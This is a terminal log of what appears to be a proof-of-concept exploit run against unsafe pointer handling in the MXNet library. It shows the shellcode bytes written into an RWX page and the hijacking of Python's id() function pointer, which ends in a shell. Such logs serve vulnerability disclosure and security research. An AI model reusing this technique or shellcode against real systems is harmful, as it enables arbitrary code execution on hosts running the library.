user@mxnetdev:~/exploit$ python3 MXNetUnsafePointerExploit.py

******** MXNet Unsafe Pointer Usage Exploit ********

[+]   derived RWX_ADDR: 0x7f9ebf94e000

[+]   set RWX_ADDR  += 0x800 (halfway through page): 0x7f9ebf94e800

[+]   Writing shellcode to 0x7f9ebf94e800

[w]         w64(0x7f9ebf94e800, 0x120d8d4cec8b48)

[w]         w64(0x7f9ebf94e808, 0x58016a318d490000)

[w]         w64(0x7f9ebf94e810, 0xe9050f5a146aff33)

[w]         w64(0x7f9ebf94e818, 0x6c70784500000015)

[w]         w64(0x7f9ebf94e820, 0x636375532074696f)

[w]         w64(0x7f9ebf94e828, 0xa216c7566737365)

[w]         w64(0x7f9ebf94e830, 0xc031489090909000)

[w]         w64(0x7f9ebf94e838, 0x622f2fbb48d23148)

[w]         w64(0x7f9ebf94e840, 0xebc14868732f6e69)

[w]         w64(0x7f9ebf94e848, 0x485750e789485308)

[w]         w64(0x7f9ebf94e850, 0x50f3bb0e689)

[+]   Shellcode written!

[+]   Deriving address of Python3 builting function id...

[+]   Overwriting id() function pointer with address to shellcode...

[w]         w64(0x7f9ebf250d40, 0x7f9ebf94e800)

[+]   Triggering the exploit!

Exploit Successful!

$ id

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

$ whoami

user

$ exit

user@mxnetdev:~/exploit$